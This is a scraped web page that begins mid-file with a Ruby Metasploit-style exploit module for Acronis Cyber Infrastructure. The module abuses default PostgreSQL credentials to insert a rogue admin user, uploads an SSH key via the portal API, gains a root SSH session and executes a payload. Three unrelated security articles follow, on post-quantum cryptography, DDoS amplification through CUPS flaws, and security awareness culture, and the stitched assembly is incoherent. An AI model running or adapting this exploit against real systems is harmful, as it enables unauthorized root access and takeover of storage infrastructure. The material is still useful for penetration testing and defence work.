to the user table    res_query = postgres_query("INSERT INTO \"user\" VALUES(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # add new admin user to the local_user table    res_query = postgres_query('SELECT * FROM "local_user" WHERE id = ( SELECT MAX (id) FROM "local_user" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_luser = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"local_user\" VALUES(\'#{id_luser}\',\'#{userid}\','default',\'#{username}\',NULL,NULL);", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # hash the password    password_hash = Password.create(password)    today = Date.today    vprint_status("Setting password #{password} with hash #{password_hash}")    res_query = postgres_query('SELECT * FROM "password" WHERE id = ( SELECT MAX (id) FROM "password" );', datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_pwd = res_query[:complete].rows[0][0].to_i + 1    res_query = postgres_query("INSERT INTO \"password\" VALUES(\'#{id_pwd}\',\'#{id_luser}\',NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    # Getting the admin roles and assign this to the new admin user    vprint_status('Getting the admin roles')    res_query = postgres_query("SELECT * FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_project_role = res_query[:complete].rows[0][0]    res_query = postgres_query("SELECT * FROM \"role\" WHERE name = 'admin';", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    id_admin_role = res_query[:complete].rows[0][0]    vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")    res_query = postgres_query("INSERT INTO \"assignment\" VALUES('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F');", datastore['VERBOSE'])    return false unless res_query.keys[0] == :complete    vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")    true  end  # create SSH session.  # based on the ssh_opts can this be key or password based.  # if login is successfull, return true else return false. All other errors will trigger an immediate fail  def do_sshlogin(ip, user, ssh_opts)    begin      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)      end    rescue Rex::ConnectionError      fail_with(Failure::Unreachable, 'Disconnected during negotiation')    rescue Net::SSH::Disconnect, ::EOFError      fail_with(Failure::Disconnected, 'Timed out during negotiation')    rescue Net::SSH::AuthenticationFailed      return false    rescue Net::SSH::Exception => e      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")    end    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket    return true  end  # login at the Acronis Cyber Infrastructure web portal  def aci_login(name, pwd)    post_data = {      username: name.to_s,      password: pwd.to_s    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),      'data' => post_data.to_s    })    return res&.code == 200  end  # returns cluster id or nil if not found  def get_cluster_id    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'clusters')    })    return unless res&.code == 200    return unless res.body.include?('data') && res.body.include?('id')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    res_json['data'].each do |cluster|      return cluster['id'] unless cluster['id'].nil?    end  end  # upload the SSH public key using the cluster_id defined at the Acronis Cyber Infrastructure web portal  def upload_sshkey(sshkey, cluster_id)    post_data = {      key: sshkey.to_s,      event:      {        name: 'SshKeys',        method: 'post',        data:        {          key: sshkey.to_s        }      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', cluster_id.to_s, 'ssh-keys'),      'data' => post_data.to_s    })    return true if res&.code == 202 && res.body.include?('task_id')    false  end  def execute_command(cmd, _opts = {})    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }  rescue Timeout::Error    @timeout = true  end  # return ACI version-release string or nil if not found  def get_aci_version    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')    })    return unless res&.code == 200    return unless res.body.include?('storage-release')    # parse json response and get the version    res_json = res.get_json_document    return if res_json.blank?    version = res_json['storage-release']['version']    return if version.nil?    release = res_json['storage-release']['release']    return if release.nil?    "#{version}-#{release}".gsub(/[[:space:]]/, '')  end  def check    version_release = get_aci_version    return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    case version_release.split(/\.\d-/)[0]    when '5.0'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')    when '5.1'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')    when '5.2'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')    when '5.3'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')    when '5.4'      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')    end    CheckCode::Safe("Version #{version_release}")  end  def exploit    # connect to the PostgreSQL DB with default credentials    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected    # add a new admin user    username = Rex::Text.rand_text_alphanumeric(5..8).downcase    userid = SecureRandom.hex    password = Rex::Text.rand_password    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)    # storing credentials at the msf database    print_status('Saving admin credentials at the msf database.')    store_valid_credential(user: username, private: password)    # log out from the postsgreSQL DB    postgres_logout if postgres_conn    # create or use own SSH private key    if datastore['PRIV_KEY_FILE'].blank?      print_status('Creating SSH private and public key.')      k = SSHKey.generate(comment: 'root')    else      print_status("Using your own SSH private key file: #{datastore['PRIV_KEY_FILE']} in PEM format.")      fail_with(Failure::NotFound, "Can not find or open SSH private key file: #{datastore['PRIV_KEY_FILE']}") unless File.file?(File.expand_path(datastore['PRIV_KEY_FILE']))      f = File.read(File.expand_path(datastore['PRIV_KEY_FILE']))      k = SSHKey.new(f, comment: 'root')    end    vprint_status(k.private_key)    vprint_status(k.ssh_public_key)    # storing SSH public and private key at the msf database    print_status('Saving SSH public and private key pair at the msf database.')    store_valid_credential(user: 'ACI SSH public key', private: k.ssh_public_key)    store_valid_credential(user: 'ACI SSH private key', private: k.private_key)    # log in with the new admin user credentials at the Acronis Admin Portal    fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)    # get cluster id to upload the SSH keys    print_status('Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.')    cluster_id = get_cluster_id    fail_with(Failure::NotFound, 'Can not find a cluster and retrieve the id.') if cluster_id.nil?    # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH    print_status('Uploading SSH public key at the Acronis Admin Portal.')    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key, cluster_id)    # login with SSH private key to establish SSH root session    ssh_opts = ssh_client_defaults.merge({      auth_methods: ['publickey'],      key_data: [ k.private_key ],      port: datastore['SSHPORT']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    print_status('Authenticating with SSH private key.')    fail_with(Failure::NoAccess, 'Failed to authenticate with SSH.') unless do_sshlogin(datastore['RHOST'], 'root', ssh_opts)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :ssh_interact      handler(ssh_socket)      return    end    @timeout ? ssh_socket.shutdown! : ssh_socket.close  endend

Acronis Cyber Infrastructure Default Password Remote Code Execution

NIST standardized three algorithms for post-quantum cryptography. What does that mean for the information and communications technology (ICT) industry?

Source: Cynthia Lee via Alamy Stock Photo

COMMENTARY

After a grueling eight years of testing, the National Institute of Standards and Technology (NIST) has finalized the first three algorithms that will form the backbone of the world's strategy to counter the potential threats of quantum computing.

Given that enterprising hackers are likely already harvesting and storing massive volumes of encrypted sensitive data for future exploitation, this is welcome news. We have the first post-quantum cryptography (PQC) algorithms to defend against the inevitable attacks on "Q-Day," when a cryptographically relevant quantum computer (CRQC) comes online.

Still, having these NIST-approved algorithms is just the first step. For the information and communications technology (ICT) industry, transitioning to a quantum-safe infrastructure is not a straightforward task; numerous challenges must be overcome. It requires a combination of engineering efforts, proactive assessment, evaluation of available technologies, and a careful approach to product development.

**The Post-Quantum Transition**

PQC algorithms are relatively new, and with no CRQC available to fully test, we cannot yet achieve 100% certainty of their success. Yet we know that any asymmetric cryptographic algorithm based on integer factorization, finite field discrete logarithms, or elliptic curve discrete logarithms will be vulnerable to attacks from a CRQC using Shor's algorithm. That means key agreement schemes (Diffie-Hellman or Elliptic Curve Diffie-Hellman), key transport (RSA encryption) mechanisms, and digital signatures must be replaced.

Conversely, symmetric-key cryptographic algorithms are generally not directly affected by quantum computing advancements and can continue to be used, with potentially straightforward increases to key size to stay ahead of quantum-boosted brute-forcing attacks.

**Hybrid Approach to Security**

The migration to PQC is unique in the history of modern digital cryptography in that neither traditional nor post-quantum algorithms are fully trusted to protect data for the required lifetimes. During the transition from traditional to post-quantum algorithms, we will need to use both algorithm types.

Defense and government institutions have already begun integrating these algorithms into the security protocols of specific applications and services due to the long-term sensitivity of their data. Private companies have also kicked off initiatives. For instance, Apple is using Kyber to create post-quantum encryption in iMessage, while Amazon is using Kyber in AWS.

Large-scale proliferation of PQC is coming, as global standards bodies, such as 3GPP and IETF, have already begun incorporating them into the security protocols of future standards releases. For instance, the IETF-designed Transport Layer Security (TLS) and Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA) — two of the most widely used protocols across 3GPP networks— will both incorporate PQC.

This kind of standardization is key for industries like telecommunications and Internet services, where hundreds of different companies are providing the different hardware, device, and software components of a network. Like any security protocol, PQC must be implemented consistently across all exposed elements in the network chain because any link that isn't quantum-safe will become the focal point of any data harvesting attack.

Over the next few years, we will see more and more PQC-enhanced products enter the market. At first, they will likely use hybrid approaches to security, using both classical and post-quantum encryption schemes, as Apple and Amazon have done. But as quantum-security technologies advance and are further tested in the market, PQC will likely replace classical asymmetric encryption methods.

Because asymmetric algorithms are largely used for secure communications between organizations or endpoints that may not have previously interacted, a significant amount of coordination in the ecosystem is needed. Such transitions are some of the most complicated in the tech industry and will require staged migrations.

**Ready for Q-Day**

PQC isn't the only way to protect against a quantum attack, as quantum threats will only increase in sophistication. It's vital to deploy a defense-in-depth strategy — one that includes physics-based solutions like preshared keys with symmetric distribution and quantum key distribution (QKD) — but PQC will be a powerful security tool.

Attention to interoperability will be key here, as crypto agility will ease the migration to pure quantum-safe algorithms in the future. Some companies are already leaning toward open source rather than proprietary code, which can help to avoid a bumpy upgrade path in future for security products. As well, this crypto agility will ensure that technologies being designed now for inclusion in next-generation/6G products will also have backward-compatibility with 5G and other earlier standards.

Now that we have the essential first algorithms to build our arsenal against quantum computing threats, the next steps for the ICT industry will be critical. They must adopt hybrid solutions now to combat harvest-now-decrypt-later attacks; embrace crypto agility, interoperability, and rigorous testing; and deploy a defense-in-depth strategy. By following this strategy, we will be well on track to ensuring our long-term security and saving the world from potential disaster when Q-Day comes.

**About the Author**

Senior Research Scientist, Nokia

Aritra Banerjee is a Senior Research Scientist in Nokia Standards leading quantum-safe standardization efforts. His research interests span cryptography, quantum technologies, security, privacy-preserving technologies, and machine learning trends.

What Communications Companies Need to Know Before Q-Day

All an attacker needs to exploit flaws in the Common Unix Printing System is a few seconds and less than 1 cent in computing costs.

Source: sofiacorte via Shutterstock

It turns out that remote code execution is not the only way attackers can leverage a critical set of four vulnerabilities that a researcher recently disclosed in the Common Unix Printing System (CUPS) for managing printers and print jobs.

The vulnerabilities apparently also enable adversaries to stage substantial distributed denial-of-service (DDoS) attacks in mere seconds and at a cost of less of than 1 cent, using any modern cloud platform.

**Large Number of Potential DDoS Attack Systems**

Some 58,000 Internet-exposed devices are currently vulnerable to the attack and can be relatively easily co-opted into launching an endless stream of attempted connections and requests at target systems. An attacker that corralled all 58,000 vulnerable hosts could send a small request to each vulnerable CUPS host and get them to direct between 1GB and 6GB of useless data at a target system.

"Although these bandwidth numbers may not be considered earth-shattering, they would still result in the target's need to handle roughly 2.6 million TCP connections and HTTP requests in either scenario," researchers at Akamai said this week after discovering the new attack vector.

CUPS is an Internet Printing Protocol (IPP)-based open source printing system for Unix-like operating systems, including Linux and macOS. It provides a standard way for computers to manage printers and print jobs.

Independent security researcher Simone Margaritelli last week disclosed a serious flaw in CUPS that could allow an attacker to remotely execute malicious commands by manipulating URLs using a combination of four different vulnerabilities. The vulnerabilities are CVE-2024-47176 in "cups-browsed," a component for simplifying printer discovery and management in a network; CVE-2024-47076 in the "libcupsfilters" software library; CVE-2024-47175 in the "libppd" library; and CVE-2024-47177 in the "cups-filters" package.

Margaritelli described the vulnerabilities as affecting most GNU/Linux distributions, some BSDs, Oracle Solaris, potentially Google Chrome OS and Chromium, and other operating systems. "The short version of this exploit is that certain configurations of cups-browsed as well as associated CUPS libraries each have vulnerabilities that, put together, allow an attacker to execute arbitrary commands against a target system" and potentially gain control of it, open source and software bill of materials management vendor Fossa said in an analysis.

**All It Takes is a Single Packet**

Margaritelli's research focused on how attackers could leverage the vulnerabilities to take control of CUPS hosts. What Akamai discovered is that a threat actor could also use them for DDoS attacks. "The problem arises when an attacker sends a crafted packet specifying the address of a target as a printer to be added," Akamai said. "For each packet sent, the vulnerable CUPS server will generate a larger and partially attacker-controlled IPP/HTTP request directed at the specified target." Akamai found that all it takes for someone to launch an attack is to send a single maliciously crafted packet to a vulnerable CUPS service with Internet connectivity.

Kyle Lefton, security researcher at Akamai, says that while the previously reported RCE exploit is more dangerous, the DDoS vulnerability is much easier for a threat actor to exploit. "It is likely that organizations may start seeing attacks leveraging this vulnerability, which causes issues for not just the targets of these DDoS attacks, but those running the vulnerable CUPS servers as well," he says. "The key takeaway here is to stress the importance of patching outdated CUPS systems, or applying other mitigation techniques, such as removing CUPS if deemed unnecessary, or applying firewall rules for UDP port 631 and keeping them from accessing the public Internet."

Akamai researchers discovered a total of 198,000 vulnerable CUPS hosts that are Internet accessible. Of those, 34%, or more than 58,000, are vulnerable to corralling for DDoS attacks. Akamai found that a threat actor could get these systems to start spewing out attack traffic by using a simple script to send a single malicious UDP packet to a vulnerable CUPS host. They found they could substantially amplify attack traffic volumes by padding — or adding extra and often irrelevant characters or data — to the URL payload.

Larry Cashdollar, principal security researcher at Akamai, says the vulnerability of a CUPS host to the DDoS attack really depends on its configuration. "It's possible that network administrators might have additional firewalls in place to block outbound traffic from the printers or that system administrators have done their hardening of the printer servers," on the other vulnerable hosts, Cashdollar says.

**Strain on Server Hardware**

Troublingly, although organizations running vulnerable CUPS systems may not be the target of DDoS attacks, the attacks themselves can put strain on the server hardware, Lefton adds. "We confirmed that some of these CUPS systems complete TLS handshakes to HTTPS protected websites, which creates further strain on server hardware and resource consumption overhead due to the handshake and encryption/decryption processing."

DDoS attacks, though well understood, continue to present a challenge for many organizations. Though many companies have implemented robust measures for protecting against DDoS attacks and mitigating fallout, the number of these attacks have only increased. Recent numbers from Cloudflare showed a 20% year-over-year increase in DDoS attacks; the company said it mitigated 8.5 million DDoS attacks just in the first six months of this year. Cloudflare attributed the trend at least partly to more threat actors gaining access to capabilities that once were available only to nation-state actors, thanks to the rise in generative AI (GenAI) tools and autopilot systems for writing attack code better and faster.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Unix Printing Vulnerabilities Enable Easy DDoS Attacks

Prioritizing security as a critical element to an organization’s effectiveness and success will reduce the risk of incidents, while benefiting the whole team and the organization’s reputation.

Source: Xavierlorenzo via Alamy Stock Photo

October is National Cybersecurity Awareness Month in the U.S. when IT teams prep their annual security education and awareness training program. For many employees, this may be their only interaction with the security team outside of onboarding, submitting a help ticket, or a potential incident. But every person plays a part in the security function of the business every day, whether they realize it or not. As they do, they have the potential to be an asset or risk to the team’s security posture.

According to the 2024 Verizon Data Breach Investigations Report (DBIR), 68% of all breaches include the human element, with people being involved either via error, use of stolen credentials or social engineering. While exploiting technical vulnerabilities is rising in frequency as the initial way-in for an attacker, stolen credentials and phishing still account for the lion’s share of recorded breaches.

Prioritizing security as a critical element to an organization’s effectiveness and success will reduce the risk of incidents, while benefiting the whole team and the organization’s reputation.

**Putting a Price on Trust**

Security is a core business function, as crucial to an organization's success as finance, revenue generation or product departments. It's also a key factor in shaping an organization's reputation, specifically influencing public and internal perceptions of whether the organization is trusted and reliable. To understand the profound impact of perceived security (or insecurity) on both public image and the bottom line, one need only examine customer reviews or stock prices of major businesses before and after a publicized breach or outage.

Security has a particularly significant impact on whether the company is seen as reliable and safe for business. The difference between a successful security program and a vulnerable one comes down to whether that value is communicated regularly and effectively.

**What's Measured Matters**

In some organizations, a CISO or CIO can advocate for security at the executive level, informing other leaders and stakeholders of its needs and value. In most businesses, however, this responsibility falls to the IT team leader, adding to their already substantial workload.

While it may seem like self-promotion or extraneous work, it’s extremely valuable to take the extra time to summarize threats stopped, processes improved, projects completed and team members modeling strong security behavior. This effort ensures that the benefits and value of the security program remain a priority for leadership, rather than being overshadowed by the next quarter's budget concerns or the hope of avoiding bad news.

Before starting from scratch, find existing resources by asking vendors and partners what performance reports and metrics they can provide. Many tools should already have audit or other templated reporting functions, and some may even offer custom summaries or executive briefings designed to update leaders on progress.

When choosing metrics, ask whether they truly advance effective security goals. As one example, a common phishing training misstep is solely tracking the number of people who click the link before and after training. While reducing risky clicks is valuable, reducing that number to zero is unlikely. Instead, focusing on how quickly someone reports a phish can materially reduce the time it takes to detect and stop a real-world attack. Now, training can emphasize the importance of reporting suspicious activity, even if an employee initially fell for the phish. This approach encourages openness rather than silence born from fear or embarrassment, and rewarding proactive behavior can significantly increase the likelihood of team members reaching out when something’s up.

Remember, what gets measured gets managed. Carefully selecting and tracking meaningful security metrics improves security posture and demonstrates the tangible value of a security program to the organization. This data-driven approach can help secure necessary resources and support for ongoing security initiatives, turning the security function from a cost center into a value driver for the business.

**Shedding the "Department of No" Reputation**

There’s an oft-repeated cliche of security as The Department of No: a roadblock to productivity, best unseen and unheard. And if most security interactions are perceived as “tedious and/or confusing” or “frustrating and/or terrifying,” people will go out of their way to avoid future interactions.

In reality, security works tirelessly to keep the organization and people within it safe and protected from innumerable risks. What may feel like an arbitrary refusal from a teammate’s perspective may very well be backed by good policy.

Improving this perception doesn't mean abandoning controls or approving every request. Instead, it requires clearly explaining why policies are in place, regularly collecting feedback on processes that prove to be roadblocks and showcasing wins as part of the normal business cadence.

Errors can be more than additional help tickets for IT teams to triage or irregularities to investigate: they can provide invaluable feedback where a process is unintuitive or misunderstood. Talking through “why” someone wanders off the authorized path can help identify confusing documentation, unconsidered use cases or other qualitative feedback that slips through what can be captured in a system log.

**What Have You Done For Them Lately?**

Most people don't have security experts on call in their personal life, and this gives security teams a unique opportunity to help, while building on their relationship with the team at large. Instead of just rolling out click-through training modules to meet insurance and compliance requirements, treat education like another opportunity to provide an employee benefit.

Inform employees about trending attacks and scams, so they can be aware and inform potentially vulnerable family members. Teach them about good security hygiene, not only on work systems but also on sites they’re likely to use in their daily life like social media or personal banking. Not only does this practice help keep your team safe from threats when they aren't at work, it also feeds back into organizational security by making them harder targets for attackers. It would be great if attackers took off nights and weekends, but in reality, we know they’ll go after access wherever (and through whomever) it’s available.

Sharing a few tips every week during team meetings, on team chat and at all-hands updates is also more digestible for people. It’s easier to absorb a few tips each week than resist the urge to tune out a dry, monotone hours-long training session.

This approach also improves retention. According to Hermann Ebbinghaus's research on memory and the “forgetting curve”, we forget the vast majority of newly learned information within a couple of days of learning it. However, the second iteration of reviewing that same information will increase both the percentage of information recalled, and how long it will be remembered. Regular refreshers and expansions on a topic will result in a more complete understanding and a resilient recall of the topic.

**Stronger Together**

Shifting the relationship of security from one of avoidance to one of reinforcement, safety and reliable guidance will motivate people to listen more carefully to security messaging. Greater understanding and buy-in cultivate a stronger security mindset across teams, defining security as a shared, proactive function rather than a specialized, reactive one.

Security is a collective effort, and helping your team stay safer inside and outside of work will benefit both them and the organization. By redefining security as a trusted ally rather than a dreaded email or meeting invite, we can create a more resilient and secure environment for all. Remember, when it comes to security, we are indeed stronger together!

**About the Author**

Security Strategist, Blumira

Zoe Lindsey is a security strategist at Blumira with over a decade of experience in information security. She began her infosec career at Duo Security in 2012 with a background in medical and cellular technology. Throughout her career, Zoe has advised organizations of all sizes on strong security tactics and strategies. As a sought-after speaker, she has shared best practices and recommendations at industry-leading events including RSA Conference, SecureWorld, and Cisco Live.

Tag

#ssl